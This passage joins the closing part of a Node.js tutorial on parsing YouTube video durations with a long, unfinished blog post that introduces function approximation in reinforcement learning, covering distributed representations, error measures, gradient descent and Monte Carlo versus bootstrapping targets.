statement, inside which we overwrite the appropriate values on our duration object corresponding to the appropriate duration part in the durationParts array. So, here, if we have 3 items, we set the duration.hours to the first item in the array, duration.minutes to the second item in the array, and duration.seconds to the third item in the array (in case the 0, 1, 2 here is confusing, remember that JavaScript arrays are zero-based meaning the first item in the array is in position zero). We repeat this pattern for the other two cases, only overwriting the values that we expect to be greater than zero (minutes and seconds for the 2 item array and just seconds for the 1 item array). With our duration object built, finally, at the bottom of our getDuration() function we return an object, using the JavaScript ... spread operator to "unpack" our duration object properties onto that new object and add an additional string property that concatenates our duration object's values together in a string. That's it! Now, we're ready to take this thing for a spin. Testing out fetching a duration To test this out, let's load up our HTTP endpoint we defined at the beginning of the tutorial in the browser and pass it some Youtube video IDs: Awesome! Try it out with any YouTube video ID to get the duration object back. Wrapping Up In this tutorial, we learned how to wire up an HTTP endpoint in Express to help us call to a function that sends a GET request for a YouTube video's metadata via the YouTube API. We learned how to use node-fetch to help us perform the request as well as how to write a function to help us parse the YouTube duration string we got back from the API. Get the latest free JavaScript and Node.js tutorials, course announcements, and updates from CheatCode in your inbox. No spam. Just new tutorials, course announcements, and updates from CheatCode.
https://cheatcode.co/tutorials/how-to-fetch-a-youtube-videos-duration-in-node-js
CC-MAIN-2022-27
refinedweb
2,529
70.02
I have a test suite of end-to-end tests. They are supposed to catch typos in SQL statements, bad table or column names (anything where DB schema and Java code disagree), or missing DB permissions. I don't want to rely on data in the database (too complicated to set up); this is just a basic test. import java.sql.*; import org.junit.Test; public class TypoTest { private Connection getConnection() throws Exception { String connectionString = "jdbc:postgresql://127.0.0.1:5432/db"; String driverClassName = "org.postgresql.ds.PGConnectionPoolDataSource"; Class.forName(driverClassName).newInstance(); return DriverManager.getConnection(connectionString, "robert", ""); } @Test public void runQuery() throws Exception { try (Connection connection = getConnection(); PreparedStatement ps = connection.prepareStatement("SELECT relname FROM pg_catalog.pg_class"); ResultSet data = ps.executeQuery()) { while (data.next()) { data.getString("relname"); } } } } When I run the above test, it fails if I have a typo in the SELECT statement. (Good.) If I have a typo in the column name in data.getString("typo here"), that won't get caught if the table queried does not have data because then the loop is never entered. To keep the test (setup) simple, I don't want to insert data into my tables first. I guess I could make the column names into constants and DRY up my code and get rid of the problem. However, I am wondering if there is an easier way... I am lazy and don't want to edit all my queries. Is there a better way to unit-test my SQL? I am using Postgres 9.5 and JDBC 4. I guess you already have the answer you seek but just for the sake of answering, you can try using result-set-metadata by using a select * from table and then checking the column names against your query (you'd have to parse the query string I guess...). I believe it will work for empty tables as well but do note that I have not tested the empty table scenario.
http://www.devsplanet.com/question/35275921
CC-MAIN-2017-04
refinedweb
328
66.54
- Tutoriales - Audio - Audio Mixer Snapshots Audio Mixer Snapshots Revisado con versión: 5 - Dificultad: Principiante In Unity it's possible to store and recall the state of an AudioMixer including volumes and effect settings using Snapshots. Snapshots can be recalled via script using the TransitionTo or the TransitionToSnapshots functions. Audio Mixer Snapshots Principiante Audio Transcripciones - 00:00 - 00:03 In Unity it's possible to save and recall - 00:03 - 00:05 the state of an audio mixer asset - 00:05 - 00:07 using snapshots. - 00:08 - 00:12 In this audio mixer master mixer - 00:12 - 00:15 we have two snapshots created. - 00:15 - 00:18 In this case Unpaused and Paused. - 00:19 - 00:22 In Unpaused we've set our levels - 00:22 - 00:25 and we've also set the cutoff frequency - 00:25 - 00:27 of a low pass filter, - 00:27 - 00:30 in this case to 22000hz. - 00:31 - 00:34 When we click on the Paused snapshot - 00:35 - 00:37 we'll see that a new cutoff frequency - 00:37 - 00:41 has been recalled, 365hz. - 00:41 - 00:43 In this case it's attenuating the high - 00:43 - 00:45 frequencies of our music track, - 00:45 - 00:48 which is running through the music group of master mixer. - 00:48 - 00:50 When the Escape key is pressed - 00:50 - 00:53 the music track will be low pass filtered. - 00:53 - 00:55 Let's check that out. - 00:57 - 00:59 When we press escape our music track - 00:59 - 01:01 is low pass filtered and when we press again. - 01:05 - 01:07 To create a new snapshot we can click - 01:07 - 01:09 the + button in the snapshots area. - 01:09 - 01:12 Now we have a copy of Unpaused - 01:13 - 01:15 and we can set our values, and now - 01:17 - 01:20 we can recall those values in the editor - 01:20 - 01:22 by clicking on the snapshot names. - 01:22 - 01:27 At runtime we can recall snapshot values - 01:27 - 01:30 using the TransitionTo function. - 01:30 - 01:33 TransitionTo takes a float in seconds - 01:34 - 01:36 and allows us to interpolate - 01:36 - 01:39 between one snapshot and another. - 01:39 - 01:42 TransitionTo is called - 01:42 - 01:45 from the audio mixer snapshot - 01:45 - 01:47 that we're transitioning to. - 01:47 - 01:50 In this project we've got a game object - 01:50 - 01:52 called Menu Canvas. - 01:52 - 01:54 Menu Canvas has a script - 01:55 - 01:57 called Pause Manager. - 01:57 - 01:59 Let's take a look at Pause Manager in mono develop. - 01:59 - 02:01 In Pause Manager we've added the - 02:01 - 02:06 namespace declarations using UnityEngine.UI - 02:06 - 02:08 and using UnityEngine.Audio. - 02:08 - 02:10 We are also checking to see if - 02:10 - 02:13 we're currently using the Unity editor - 02:13 - 02:15 and if so we'll include the - 02:15 - 02:17 Unity editor namespace. - 02:19 - 02:21 Inside our class we're declared two public - 02:21 - 02:24 variables of the audio mixer snapshot type - 02:24 - 02:27 called Paused and Unpaused. - 02:27 - 02:30 We've also declared a variable of the type canvas - 02:30 - 02:32 called Canvas. - 02:32 - 02:34 In our start function we're getting a reference - 02:34 - 02:37 to our canvas component using GetComponent. - 02:39 - 02:42 In update we're checking to see if the escape - 02:42 - 02:44 key has been pressed. - 02:44 - 02:46 If it has we'll flick the enabled - 02:46 - 02:47 state of canvas - 02:48 - 02:51 to Enabled if it's disabled - 02:51 - 02:53 or Disabled if it's enabled. - 02:53 - 02:56 We'll also call the Pause function. - 02:56 - 02:58 In Pause we're going to check - 02:58 - 03:00 to see if time.timeScale - 03:00 - 03:02 is equal to 0. - 03:02 - 03:05 And if it's not we're going to set it to 0. - 03:06 - 03:08 If it is we'll set it to 1. - 03:09 - 03:12 Next we're going to call the low pass function. - 03:14 - 03:16 The low pass function also checks to see if - 03:16 - 03:19 time.timeScale is equal to 0 - 03:19 - 03:23 and if it is it will call the TransitionTo function - 03:23 - 03:25 from the Paused snapshot. - 03:25 - 03:27 We're going to parse in the floating point parameter - 03:27 - 03:29 time to reach, which in this case - 03:29 - 03:31 is 0.01 seconds. - 03:31 - 03:35 If time.timeScale is not equal to 0 - 03:35 - 03:37 we're going to call TransitionTo - 03:37 - 03:40 from the Unpaused snapshot, - 03:40 - 03:42 also parsing in that same - 03:42 - 03:45 0.01 second parameter - 03:45 - 03:47 for the time to make the transition - 03:47 - 03:50 We have a public function called Quit which is going to check - 03:50 - 03:53 if we're using the Unity editor - 03:53 - 03:55 and if we are it's going to set - 03:55 - 03:58 EditorApplication.isPlaying to false, - 03:58 - 04:01 meaning it's going to stop playing our scene. - 04:01 - 04:04 If we're not using the editor, meaning this is a - 04:04 - 04:06 build of our game we're going to call - 04:06 - 04:08 application.Quit, meaning we're going to - 04:08 - 04:11 quit the application out to the desktop. - 04:15 - 04:18 In the Unity editor we've assigned the Paused and - 04:18 - 04:20 the Unpaused snapshots - 04:20 - 04:23 to the audio mixer snapshots that we created - 04:23 - 04:26 in master mixer here. - 04:26 - 04:28 If we want to change these we can do so - 04:28 - 04:30 using the asset picker. - 04:31 - 04:34 When transitioning between snapshots - 04:34 - 04:37 the default interpolation curve is linear. - 04:38 - 04:41 We can change that by selecting a parameter, - 04:41 - 04:44 right clicking on it and choosing one of these - 04:44 - 04:46 override transition types. - 04:46 - 04:49 The smooth step snapshot transition type - 04:50 - 04:53 will give us an S shaped transition curve. - 04:53 - 04:57 Squared will give us a parabolic curve. - 04:57 - 05:00 Square root will give us a square root curve. - 05:01 - 05:04 Brick wall start will immediately transition - 05:04 - 05:06 to the stored value being transitioned - 05:06 - 05:09 to at the beginning of the transition. - 05:10 - 05:12 Brick wall end will wait until the - 05:12 - 05:15 transition time has elapsed and then - 05:15 - 05:18 make a hard transition to the stored value. - 05:19 - 05:22 In addition to using TransitionTo - 05:22 - 05:24 it's also possible to transition - 05:24 - 05:27 to an interpolated blend - 05:27 - 05:30 of multiple snapshots using the transition - 05:30 - 05:32 to snapshots function. - 05:32 - 05:36 Transition to snapshots function takes 3 parameters. - 05:36 - 05:41 The first, an array of audio mixer snapshots - 05:41 - 05:44 allows us to choose which snapshots - 05:44 - 05:46 we want to create a blend between. - 05:46 - 05:49 Second parameter is an array of floats. - 05:49 - 05:51 It allows us to specify the weighting - 05:51 - 05:55 of each element in the resulting blend. - 05:55 - 05:57 The third parameter is a float - 05:57 - 06:00 in seconds which allows us to specify - 06:00 - 06:04 the time to reach the new desired blend. - 06:04 - 06:06 Transition to snapshots is called - 06:06 - 06:08 from the audio mixer that contains the snapshot - 06:08 - 06:10 that we're transitioning between. - 06:11 - 06:15 What we've got here is we've setup 3 cube triggers. - 06:16 - 06:18 When our player collides with each one of these - 06:18 - 06:21 we will transition to a blend - 06:21 - 06:23 of 2 snapshots. - 06:24 - 06:27 Each of the snapshots has been setup - 06:27 - 06:30 in our sound effects sub mixer. - 06:31 - 06:34 The sound effects sub mixer is running in to the sound effects - 06:34 - 06:37 group of our master mixer. - 06:37 - 06:39 I've turned down the music for this example. - 06:41 - 06:44 In the sound effects mixer, on the gun shots group - 06:44 - 06:46 we've added a send effect. - 06:47 - 06:49 This is under Add Send - 06:49 - 06:51 and what this will do is send a copy of the - 06:51 - 06:54 signal from gun shots to the receive effect - 06:54 - 06:56 that we've added to reverb return. - 06:56 - 06:58 The receive effect will pass it's signal to our - 06:58 - 07:01 SFX reverb effect which will cause our gunshots - 07:01 - 07:04 to sound like they're happening in a reverberant space. - 07:05 - 07:07 We've setup two snapshots. - 07:08 - 07:12 One with no reverb in which the send level - 07:12 - 07:14 for our gun shots send effect - 07:14 - 07:16 is turned all the way down. - 07:16 - 07:18 The next is heavy reverb - 07:18 - 07:20 where it's turned all the way up, - 07:21 - 07:23 and we can just listen to how those sound. - 07:25 - 07:27 Edit In Play Mode. - 07:29 - 07:30 Click, we can hear no reverb. - 07:31 - 07:33 Select heavy reverb. - 07:35 - 07:38 I've intentionally put a very strong unrealistic - 07:38 - 07:41 reverb on there so that we can hear the effect clearly. - 07:41 - 07:43 Now we've created these three - 07:43 - 07:48 transparent cubes called reverb trigger 1, 2 and 3. - 07:49 - 07:51 Each of them has a copy of the script reverb - 07:51 - 07:52 trigger on it. - 07:52 - 07:54 Reverb trigger is a simple script - 07:54 - 07:56 which contains a public variable for our - 07:56 - 07:59 reverb control script, and a public - 07:59 - 08:01 integer called trigger number. - 08:03 - 08:05 When the player collides with the trigger - 08:05 - 08:07 that this is attached to it's going to call - 08:07 - 08:10 the blend snapshot function of - 08:10 - 08:14 reverb control, which takes an integer trigger number. - 08:15 - 08:18 In Unity we've assigned the reverb - 08:18 - 08:21 control variable by dragging and dropping - 08:21 - 08:23 our audio mixer control object, - 08:24 - 08:26 which has that script attached to it. - 08:26 - 08:29 We've also assigned unique trigger numbers - 08:29 - 08:31 to each of these trigger objects. - 08:32 - 08:35 On our audio mixer control game object we have - 08:35 - 08:37 our reverb control script. - 08:38 - 08:40 In our reverb control script we have - 08:40 - 08:43 the namespace declaration using UnityEngine.Audio. - 08:43 - 08:46 This allows us to access members - 08:46 - 08:49 of UnityEngine.Audio like the audio mixer, - 08:50 - 08:53 and audio mixer snapshot classes. - 08:53 - 08:57 We've declared a public variable of the audio mixer type - 08:57 - 09:00 called Mixer and also an array - 09:00 - 09:03 of audio mixer snapshots - 09:03 - 09:05 called Snapshots. - 09:05 - 09:09 We've also declared a public array of floats - 09:09 - 09:12 called Weights and we're going to use these - 09:12 - 09:15 to specify the weightings of each of the snapshots - 09:15 - 09:20 as we blend between our different snapshot states. - 09:20 - 09:23 We have a public function called BlendSnapshot, - 09:23 - 09:28 which takes a parameter of the type int called TriggerNr. - 09:28 - 09:30 This is the int that we're getting from our - 09:30 - 09:33 reverb trigger script when the player collides with the collier. - 09:33 - 09:35 We have a switch statement here which takes - 09:35 - 09:37 trigger number and chooses which of the - 09:37 - 09:39 colliders we've collided with, - 09:39 - 09:42 case 1, case 2 and case 3. - 09:42 - 09:44 In each of these cases we're going to set - 09:44 - 09:46 the weights of the weight array to correspond - 09:46 - 09:48 to the percentage of which - 09:48 - 09:51 snapshot we want to contribute to the blend. - 09:51 - 09:54 In case 1 which will be selected if they player triggers - 09:54 - 09:58 the right-most red trigger collider. - 09:58 - 10:01 We'll set the weights of our weights array - 10:01 - 10:03 to 1.0 and 0. - 10:03 - 10:07 What this will mean is that our resulting snapshot - 10:07 - 10:09 blend which will be created - 10:09 - 10:12 when we call mixer.transitionToSnapshot - 10:12 - 10:16 is a blend which is 100% of the snapshot - 10:16 - 10:18 at 0 in the snapshots array - 10:18 - 10:23 and 0% of the snapshot at 1 in the snapshots array. - 10:23 - 10:26 In case 3 we're doing the opposite thing, in this - 10:26 - 10:29 case we're going to have 0% of our no reverb - 10:29 - 10:32 snapshot and 100% of our heavy reverb snapshot. - 10:32 - 10:34 But case 2 is where things - 10:34 - 10:37 get interesting and where transition to snapshots - 10:37 - 10:39 becomes really useful. - 10:39 - 10:42 Here we're creating a third reverb state - 10:42 - 10:44 by transitioning to this blend - 10:44 - 10:49 of 25% of our no reverb snapshot - 10:49 - 10:53 and 75% of our heavy reverb snapshot. - 10:53 - 10:56 So we've created a third reverb state - 10:56 - 10:59 by transitioning to a blend of our - 10:59 - 11:01 two existing snapshots. - 11:01 - 11:04 In Unity we've assigned the variables - 11:04 - 11:06 of our reverb control script - 11:06 - 11:09 by dragging in our sound effects mixer asset - 11:09 - 11:12 to our mixer variable slot. - 11:12 - 11:15 We've also assigned the snapshots - 11:15 - 11:17 by clicking and selecting them from the list. - 11:17 - 11:20 Here we have our no reverb snapshot, - 11:20 - 11:23 and here we have our heavy reverbs snapshot. - 11:23 - 11:26 We've also set the size of our weights - 11:26 - 11:28 array to 2 so that it will - 11:28 - 11:30 match up to the size of - 11:30 - 11:32 our snapshots array and so that these - 11:32 - 11:34 lists of elements can line up. - 11:34 - 11:36 We haven't initialised the values here because - 11:36 - 11:39 those are going to be set by the script at run time. - 11:39 - 11:42 As we give this a try pay attention to the reverb - 11:42 - 11:46 return level on our gun shots track - 11:46 - 11:48 and watch how it changes as our - 11:48 - 11:50 character moves through each of the different - 11:50 - 11:52 triggers, let's give it a try. - 12:10 - 12:12 So what we've done here is we've used - 12:12 - 12:15 our two snapshots no reverb and heavy reverb - 12:15 - 12:18 to create this third blended snapshot - 12:18 - 12:20 represented by the purple collider. - 12:20 - 12:23 And, so we've chosen to show reverb here - 12:23 - 12:25 but this technique is applicable to all - 12:25 - 12:29 sorts of audio states and really any type of - 12:29 - 12:31 mixer state that you can save - 12:31 - 12:34 in a snapshot can be blended - 12:34 - 12:36 and recalled using this same technique. Tutoriales relacionados - Audio Mixer and Audio Mixer Groups (Lección) - Audio Effects (Lección) - Send and Receive Audio Effects (Lección) - Duck Volume Audio Effect (Lección) - Exposed AudioMixer Parameters (Lección) Documentación relacionada - Pre-Order Unity 5 Blog post (Blog)
https://unity3d.com/es/learn/tutorials/topics/audio/audio-mixer-snapshots?playlist=17096
CC-MAIN-2019-35
refinedweb
2,880
75.24
Evan Prodromou wrote: > > But hey, I don't expect much compliance given that you've > > ignored the pleas for less namespace pollution back in 2002 > > when you were asked to do so in bug #150181. :P > > So, maybe it'd help if you explained what you mean by "pollution" > the Debian package namespace. The Debian package namespace is like parking lots: in general it's first come, first served. But as with parking lots, it's not first come, first served *only*. As there are some potential parking lots that are just too public to be actually used as parking lots (like right in front of the city hall entry), there are some package names that are just too generic to belong to any specific package (like "terminal"). For a more correct and more technical explanation of the concept of "namespace pollution", see any serious book on software design. It's just of no *real* use to anyone (not even to users of your package) to give a non-general package a general name. It just confuses (and annoys) a lot of people. Yes, there are some historical exceptions (e.g. "diff"), but these are widely tolerated because there hadn't been any serious alternatives for a long time.
https://lists.debian.org/debian-devel/2004/04/msg00325.html
CC-MAIN-2015-32
refinedweb
209
68.1
Hi, can you tell me why I am getting this error "[2013-12-05 11:06:26 - Emulator] Failed to create Context 0x3005 '". What is the use of Oracle's VirtualBox. How it will help to solve this... Type: Posts; User: kalaicse30@gmail.com Hi, can you tell me why I am getting this error "[2013-12-05 11:06:26 - Emulator] Failed to create Context 0x3005 '". What is the use of Oracle's VirtualBox. How it will help to solve this... Hi, I am entirely new for Android Development and i am trying to do small task in Android(Registration Form).But i am getting Error like this.Please anyone help me to solve this prob.... ... I did not get proper answer from on my research, that is why I posted in formun --- Update --- Is types are available are it is depending upon technology which is using like struts,spring... Hi Friends, How many MVC types are there and what are the difference between them? I got this question from an interview.. Kindly help me to clear my doubt.... Regards, Tan q for all who all are response me,I got a perfect output.. import java.util.*; public class Stringmaxrepeate { public static void main(String args[]) { Scanner in=new Scanner(System.in); String[] s=new String[10]; int count=1; Map... I got out put tanq. Hi friends, I am trying to find the Count continuous repeated occurrence of string in string array. (eg) input: now now how cow how output: now---->2 but i d't know what is wrong... Hi Friends, My Application UI is Developed by using JSP,Servelet.My Question is How to set the Screen Resolution in JSP. Which is comportable for all the System. Regards, Kalaiyarasi Tan q for ur Replay. My question is I will create object for DerivedClass. BaseClass1 and Baseclass2 both are having same function name with same parameter list like Display().If I try to call... Hi Frnds, I know java does not support multiple inheritance because of diamond problem of multiple inheritance but my question is how it could be achieved in C++.Because C++ support multiple... Hi, My application support airtel service with airtel APN but i have to make my application should support all SIM Services(It should be Universal).Please anybody know the common APN for all SIM... Hi, My application support airtel service with airtel APN but i have to make my application should support all SIM Services.Please anybody know the common APN for all SIM Services.How i can make... Thank you Hi Friends, I want to do SCJP Certification.Please anybody tell me What is the difference between SCJP 5 &6.Which is having more scope and How to apply for the Exam? Regards, Kalaiyarasi.D It is not a classpath problem,it is a part of task,with out including above code jar file is created successfully.If include above code it giving compilation error cannot find symbol [javac]... Hi, Here I am giving my sample code, import com.nxp.atop.baseband.Baseband; import com.nxp.telematics.otp.*; public class sms { Otp otp = OtpFactory.getOtp(); System.out.println(" get... Hi Friends, I'm developing device application in JAVA. I want to know how to get IMEI in java. Please help. Regards, Kalaiyarasi Hi Friends, I am having 1 year experience form java developing(Core java,Servelet and Jsp).Now i am planing to switch from my current company. But i don't know what are the things need to... Hi, Im trying to pass array list from servlet to jsp page.but it always shows null values.i do not know whether it s problem from data base connectivity or passing array list. Hi I m trying to pass the arraylist from Servelet to JSP page Which data is get t from My SQL data base.Plz anyone help me whats wrong in my code part Login.java package com;
http://www.javaprogrammingforums.com/search.php?s=02777deae04ac56e54f8aa21890931c4&searchid=1075588
CC-MAIN-2014-41
refinedweb
660
68.47
Dissecting Reinforcement Learning-Part.7 So far we have represented the utility function by a lookup table (or matrix if you prefer). This approach has a problem. When the underlying Markov decision process is large there are too many states and actions to store in memory. Moreover in this case it is extremely difficult to visit all the possible states, meaning that we cannot estimate the utility values for those states. The key issue is generalization: how to produce a good approximation of a large state space experiencing only a small subset. In this post I will show you how to use a linear combination of features in order to approximate the utility function. This new technique will allow us to master new and old problems more efficiently. For example, in this post you will learn how to implement a linear version of the TD(0) algorithm and how to use it to find the utilities of multiple gridworlds. The reference for this post is chapter 8 for the Sutton and Barto’s book called “Generalization and Function Approximation”. Moreover a good resource is the video-lesson 6 of David Silver’s course. A wider introduction to function approximation is given by any good machine learning textbook, I suggest Pattern Recognition and Machine Learning by Christopher Bishop. I want to start this post with a brief excursion in the neuroscience world. Let’s see how a function approximator relates to biological brains. Approximators (and grandmothers) You couldn’t read this post without using a powerful approximator: your brain. The first primordial brains, a bunch of nerve cells, gave a great advantage allowing elementary creatures to better perceive and react, considerably extending their lifespan. Evolution shaped brains for thousands of years optimising size, modularity, and connectivity. Having a brain seems a big deal. Why? What’s the purpose of having a brain? We can consider the world as a huge and chaotic state-space, where the correct evaluation of a specific stimulus makes the difference between life and death. The brain stores information about the environment and allows an effective interaction with it. Let suppose that our brain is a massive lookup table, which can store in a single neuron (or cell) a single state. This is known as local representation. This theory is often called the grandmother cell. A grandmother cell is a hypothetical neuron that responds only to a specific and meaningful stimulus, such as the image of one’s grandmother. The term is due to the cognitive scientist Jerry Lettvin who used it to illustrate the inconsistency of the concept during a lecture at MIT. To describe the grandmother cell theory I will use the following example. Let’s suppose we bring a subject in an isolated room. The activity of a group of neurons in the subject brain is constantly monitored. In front of the subject there is a screen. Showing to the subject the picture of his grandmother we notice that a specific neuron fires. Showing the grandmother in different contexts (e.g. in a group picture) activates again the neuron. However showing on screen a neutral stimulus does not activate the neuron. During the 1970s the grandmother cell moved into neuroscience journals and a proper scientific discussion started. In the same period Gross et al. (1972) observed neurons in the inferior temporal cortex of the monkey that fired selectively to hands and faces. The grandmother cell theory started to be seriously taken into account. The theory was appealing because simple to grasp and pretty intuitive. However a theoretical analysis of the grandmother cell confirmed many underlying weaknesses. For instance, in this framework the loss of a cell means the loss of a specific chunk of information. Basic neurobiological observations strongly suggest the opposite. It is possible to hypothesise multiple grandmother cells, which codify the same information in a distributed way. Redundancy prevents loss. This explanation complicate even more the situation, because storing a single state requires multiple entries in the lookup table. To store states without the risk of information loss, at least cells are required. The paradox of the grandmother cell is that trying to simplify the brain functioning, it finishes to complicate it. There is an alternative to the grandmother cell hypothesis? We can suppose that information is stored in a distributed way, and that each single concept is represented through a pattern of activity. This theory was strongly sustained by researchers such as Geoffrey Hinton (one of the “godfather” of deep learning), and James McClelland. The distributed representation theory gives a big advantage. Having cells it is possible to represent more than states, whereas this is not true for a local representation. Moreover a distributed representation is robust against loss and it guaranties an implicit redundancy. Even though each active unit is less specific in its meaning, the combination of active units is far more specific. To understand the difference between the two representations think about a computer keyboard. In the local representation each single key can codify only a single character. In the distributed representation we can use a combination of keys (e.g. Shift and Ctrl) to associate multiple characters to the same key. In the image below (inspired by Hinton, 1984) is represented how two stimuli (red and green dots) are codified in a local and distributed scheme. The local scheme is represented as a two dimensional grid, where it is always necessary to have two active units to codify a stimulus. We can think the distributed representation as an overlapping between radial units. The two stimuli are codified through an high level pattern given by the units enclosed in a specific activation radius. How is it possible to explain the monkey selective-neurons described by Gross et al. (1972) using a distributed representation? A selective-neuron can be the visible part of an underlying network which encapsulate the information. Further research showed that those selective neurons had a large variation in their responsiveness and that it was connected to different aspects of faces. This observation suggested that those neurons embedded a distributed representation of faces. If you think that the grandmother cell theory is something born and dead in the Seventies you are wrong. In recent years the local representation theory received support from biological observations (see Bowers 2009), however these results have been strongly criticised by Plaut and McClelland (2009). For a very recent survey I suggest you this article. From a machine learning perspective we know that the distributed representation works. The success of deep learning is based on neural networks, which are powerful function approximators. Moreover different methods, such as dropout, are tightly related to the distributed representation theory. Now it’s time to go back to reinforcement learning, and see how a distributed representation can solve the problems due to local representation. Function approximation intuition Here I will use again the robot cleaning example described in previous posts. The robot moves in a two-dimensional world we called gridworld. It has only 4 possible actions available (forward, backward, left, right) and its goal is to reach a charger (green cell) and avoid to fall on stairs (red cell). I define with our usual utility function, and with the state-action function. The grid-world is a discrete rectangular state space, having columns and rows. Using a tabular approach we can represent using a table containing elements, where represent the total number of states. To represent we need a table of size , where is the total number of actions. In the previous posts I always represented the lookup tables using matrices. As utility function I used a matrix having the same size of the world, whereas for the state-action function I used a matrix having columns (states) and rows (actions). In the first case, to get the utility we have to access the location of the matrix corresponding to the particular state where we are. In the second case, we use the state as index to access the column in the state-action matrix and from that column we return the utilities of all the available actions. How can we fit the function approximation mechanism inside this scheme? Let’s start with some definitions. Defining as the set of possible states, and as the set of possible actions, we define a utility function approximator having parameters stored in a vector . Here I use the hat on top of to differentiate this function from the tabular version . Before explaining how to create a function approximator it is helpful to visualise it as a black box. The method described below can be used on different approximators and for this reason we can easily apply it to the box content. The black box takes as input the current state and returns the utility of the state or the state-action utilities. That’s it. The main advantage is that we can approximate (with an arbitrary small error) the utilities using less parameters respect to the tabular approach. We can say that the number of elements stored in the vector is smaller than the number of values in the tabular counterpart. I guess there is a question that came to your head: what there is inside the black box? This is a legitimate question and now I will try to give you the intuition. In the case of a blackbox that is approximating an utility function, the content of the box is . You can imagine the utility function as a music mixer and the vector of weights as the mixer sliders. We want to adjust the sliders in order to obtain a sound which is similar to a predefined tone. How to do it? Well we can move one of the slider and compare the output with the reference tone. If the output is more similar to the reference we know that we moved the right slider. Repeating this process many times we eventually obtain a tone which is very similar to the reference sound. Using a more formal view we can say that the vector is adjusted at every iteration, moving the values of a quantity , in order to reach an objective which is minimising a function of cost. The cost is given by an error measure that we can obtain comparing the output of the function with a target. For instance, we know from previous posts that the actual utility value of state (4,1) in our gridworld is 0.388. Let’s say that at time the output of the box is 0.352. After the update step the output will be 0.371, we moved closer to the target value. Function approximation is an instance of supervised learning. In principle all the supervised learning techniques could be used in function approximation. The vector may be the set of connection weights of a neural network or the split points and leaf values of a decision tree. However here I will consider only differentiable function approximators such as linear combination of features and neural networks, which represents the most promising techniques nowadays. In this post I will focus on linear combination of features. Before describing the simplest case the linear approximator, I would like to introduce the general methodology used to adjust the vector of weights. The goal in function approximation is to move as close as possible to the real utility function adjusting the internal parameters stored in . To achieve this goal we need two things, first an error measure that can give us a feedback on how close we are to the target, second an update rule for adjusting the weights. In the next section I will describe these two components. Method To improve the performance of our function approximator we need an error measure and an update rule. These two components work tightly in the learning cycle of every supervised learning technique. Their use in reinforcement learning is not much different from how they are used in a classification task. In order to understand this section you need to refresh some concepts of multivariable calculus such as the partial derivative and gradient. Error Measure: a common error measure is given by the Mean Squared Error (MSE) between two quantities. For instance, if we have the optimal utility function and an approximator function , then the MSE is defined as follows: that’s it, the MSE is given by the expectation that quantifies the difference between the target and the approximator output. When the training is working correctly the MSE will decrease meaning that we are getting closer to the optimal utility function. The MSE is a common loss function used in supervised learning. However, in reinforcement learning it is often used a reinterpretation of the MSE called Mean Squared Value Error (MSVE). The MSVE introduce a distribution that specifies how much we care about each state . As I told you the function approximator is based on a set of weights that contains less elements than the total number of states. For this reason adjusting a subset of the weights means improving the utility prediction of some states but loosing precision in others. We have limited resources and we have to manage them carefully. The function gives us an explicit solution and using it we can rewrite the previous equation as follows: Update rule: the update rule for differentiable approximator is gradient descent. The gradient is a generalisation of the concept of derivative applied to scalar-valued functions of multiple variables. You can imagine the gradient as the vector that points in the direction of the greatest rate of increase. Intuitively, if you want to reach the top of a mountain the gradient is a signpost that in each moment show you in which direction you should walk. The gradient is generally represented with the operator also known as nabla. The goal in gradient descent is to minimise the error measure. We can achieve this goal moving in the direction of the negative gradient vector, meaning that we are not moving anymore to the top of the mountain but downslope. At each step we adjust the parameter vector moving a step closer to the valley. First of all, we have to estimate the gradient vector for or . Those error functions are based on . In order to get the gradient vector we have to calculate the partial derivative of each weight with respect to all the other weights. Secondly, once we have the gradient vector we have to adjust the value of all the weights in accordance with the negative direction of the gradient. In mathematical terms, we can update the vector at as follows: The last step is an application of the chain rule that is necessary because we are dealing with a function composition. We want to find the gradient vector of the error function with respect to the weights, and the weights are part of our function approximator . The minus sign in front of the quantity 1/2 is used to change the direction of the gradient vector. Remember that the gradient points to the top of the hill, while we want to go to the bottom (minimizing the error). In conclusion the upate rule is telling us that all we need is the output of the approximator and its gradient. Finding the gradient of a linear approximator is particularly easy, whereas in non-linear approximators (e.g. neural networks) it requires more steps. At this point you might think we have all we need to start the learning procedure, however there is an important part missing. We supposed it was possible to use the optimal utility function as target in the error estimation step. We do not have the optimal utility function. Think about that, having this function would mean we do not need an approximator at all. Moving in our gridworld we could simply call at each time step and get the actual utility value of that state. What we can do to overcome this problem is to build a target function which represent an approximated target and plug it in our formula: How can we estimate the approximated target? We can follow different approaches, for instance using Monte Carlo or TD learning. In the next section I will introduce these methods. Target estimation In the previous section we came to the conclusion that we need approximated target functions and to use in the error evaluation and update rule. The type of target used is at the heart of function approximation in reinforcement learning. There are two main approaches: Monte Carlo target: an approximated value for the target can be obtained through a direct interaction with the environment. Using a Monte Carlo approach (see the second post) we can generate an episode and update the function based on the states encountered along the way. The estimation of the optimal function is unbiased because , meaning that the prediction is guaranteed to converge. Bootstrapping target: the other approach used to build the target is called bootstrapping and I introduced it in the third post. In bootstrapping methods we do not have to complete an episode for getting an estimation of the target, we can directly update the approximator parameters after each visit. The simplest form of bootstrapping target is the one based on TD(0) which is defined as follows: That’s it, the target is obtained through the approximation given by the estimator itself at . I already wrote about the differences between the two approaches, however here I would like to discuss it again in the new context of function approximation. In both cases the functions and are based on the vector of weights . For this reason the correct notation we are going to use from now on is and . We have to be particularly careful when using the bootstrapping methods in gradient-based approximators. Bootstrapping methods are not true instances of gradient descent because they only care about the parameters in . At training time we adjust in the estimator based on a measure of error but we are not changing the parameters in the target function based on an error measure. Bootstrapping ignores the effect on the target, taking into account only the gradient of the estimation. For this reason bootstrapping techniques are called semi-gradient methods. Due to this issue semi-gradient methods does not guarantee the convergence. At this point you may think that it is better to use Monte Carlo methods because at least they are guaranteed to converge. Bootstrapping gives two main advantages. First of all they learn online and it is not required to complete the episode in order to update the weights. Secondly they are faster to learn and computationally friendly. The Generalised Policy Iteration (GPI) (see second post) applies here as well. Let’s suppose we start with a random set of weights. At the very first step the agent follows an epsilon-greedy strategy moving in the state with the highest utility. After the first step it is possible to update the weights using gradient descent. What’s the effect of this adjustment? The effect is to slightly improve the utility function. At the next step the agent follows again a greedy strategy, then the weights are updated through gradient descent, and so on and so forth. As you can see we are applying the GPI scheme again. Linear approximator It’s time to put everything together! We have built a method based on an error measure and an update rule and we know how to estimate a target. Now I will show you how to build an approximator, the content of the black box, represented by the function . I will describe a linear approximator which is the simplest case of linear combinations, whereas in the next section I will describe some high order approximators. Before describing a liner approximator I want to clarify a crucial point in order to avoid a common missunderstanding. The linear approximator is a particular case of the broader class of linear combination of features. A liner combination is based on a polynomial which can be or 